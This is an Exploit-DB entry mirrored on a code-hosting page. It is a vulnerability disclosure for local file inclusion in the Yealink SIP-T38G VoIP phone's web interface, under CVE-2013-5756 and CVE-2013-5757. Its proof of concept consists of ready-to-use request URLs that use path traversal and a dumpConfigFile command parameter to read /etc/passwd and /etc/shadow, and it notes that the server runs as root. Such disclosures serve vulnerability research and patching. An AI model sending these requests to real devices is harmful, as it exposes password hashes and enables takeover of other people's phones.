bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/33740.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

23 lines
No EOL
838 B
Text
Raw Permalink Blame History

Title: Yealink VoIP Phone SIP-T38G Local File Inclusion
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5756, CVE-2013-5757
Description:
Web interface contain a vulnerability that allow any page to be included.
We are able to disclose /etc/passwd & /etc/shadow
POC:
Using the page parameter (CVE-2013-5756):
http://
[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://
[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
Using the command parameter (CVE-2013-5757):
http://[host]/cgi-bin/cgiServer.exx?command=dumpConfigFile("/etc/shadow")
*By viewing the shadow file we are able to conclude that cgiServer.exx run
under the root privileges. This lead to CVE-2013-5759.
Reference in a new issue View git blame Copy permalink